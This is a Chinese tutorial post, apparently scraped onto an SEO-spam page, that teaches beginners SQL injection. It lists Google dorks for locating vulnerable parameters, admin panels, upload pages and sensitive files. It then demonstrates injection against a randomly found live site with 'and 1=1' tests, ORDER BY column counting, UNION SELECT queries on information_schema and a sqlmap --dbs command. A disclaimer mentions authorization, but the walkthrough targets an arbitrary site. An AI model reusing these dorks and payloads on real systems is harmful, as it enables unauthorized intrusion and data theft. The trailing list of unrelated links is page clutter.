当前位置: 首页 > news >正文

网站布局设计步骤user pro wordpress

网站布局设计步骤,user pro wordpress,公司开发设计推荐,软件设计师网站有哪些目录 一、信息收集 二、实战演示 三、使用sqlmap进行验证 四、总结 一、信息收集 1.查找带有ID传参的网站(可以查找sql注入漏洞) inurl:asp idxx 2.查找网站后台(多数有登陆框,可以查找弱口令,暴力破解等漏洞&…

目录

一、信息收集

二、实战演示

三、使用sqlmap进行验证

四、总结


一、信息收集

1.查找带有ID传参的网站(可以查找sql注入漏洞)
inurl:asp id=xx
2.查找网站后台(多数有登陆框,可以查找弱口令,暴力破解等漏洞)
site:http://xxxx.com “admin”
site:http://xx.com intext:管理
site:http://xx.com inurl:login
site:http://xx.com intitle:后台
3.查看上传漏洞
site:http://xx.com inurl:file
site:http://xx.com inurl:load
4.查找敏感文件
filetype:mdb|doc|xlsx|pdf

二、实战演示

1.谷歌语法搜索
inurl:php id=62
 

图片


随便点进一个带有id传参=62的网站,大概率存在SQL注入
 

图片


2.判断是否存在SQL注入漏洞,显示页面正常
id=62 and 1=1

图片


3.id=62 and 1=1显示页面不正常,已经肯定存在SQL注入
 

图片


4.查找列数
id=62 order by 10
发现列数是10
 

图片


5.查看回显点
id=111111 union select 1,2,3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database() limit 0,1-- qwe

图片

6.输出表名
id=111111 union select 1,2,3,4,5,6,table_name,8,9,10 from information_schema.tables where table_schema=database() limit 0,1-- qwe

图片

三、使用sqlmap进行验证

使用sqlmap命令查看库名
sqlmap.py -u url --dbs

图片

图片

四、总结

1.谷歌语法找到注入点
2.判断注入是否存在
3.查找列数
4.查找表名
5.使用sqlmap进行验证
这次实战记录很适合新手小白挖SRC,希望多多支持!

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

图片

没看够~?欢迎关注!

http://www.yayakq.cn/news/137403/

相关文章:

  • 郑州高端定制建设网站广告制作宣传
  • 建立网站需要什么硬件wordpress themes.php 打不开
  • 学校网站建设先进个人荣誉应该选用
  • 工商网站如何做实名成都建设网站公司
  • 阿里巴巴做网站分录网站建设数据库软件
  • 做啥网站好青海省高等级公路建设管局网站
  • 西宁电子商务网站建设wordpress跳转页面插件
  • 网站建设方案的内容做物流网站找哪家好
  • 网站的反链怎么做微信网页版网址是多少
  • 网站建设文化信息wordpress表单 慢
  • 孝感专业做网站公司建设无障碍网站
  • 免费注册网页的网站莱芜信息港
  • 济宁建设局官方网站营销策划书格式及范文
  • 泉州网站建设网站建设新安县住房和城乡建设局网站
  • 黄页88网站企业运营公司
  • 车险网站模版商城系统网站建设开发
  • 温州市建设小学大南网站做网站公司平台
  • 家装企业网站系统下载与铁路建设相关的网站
  • 假视频网站源码出售图片设计图
  • 博山做网站公司网站备案时间有效期
  • 人和动物做的网站东莞人才市场档案接收电话
  • 长沙个人做网站能制作网页的软件是
  • 百度站长平台登录石家庄招聘哪个网站做的好
  • 长春做网站的公司哪家好怎么设计页面只显示一页
  • 网站建设面谈话术佛山建设网站公司
  • 自己做的网站如何发布会设计网站怎么做兼职
  • 企业网站优化方案模板淘宝网站c 设计怎么做
  • 查询网站入口嵌入式设计与开发
  • 网站建设全包需要多少钱兰州做高端网站
  • 谷歌网站建设代理自己做单词卡的网站是什么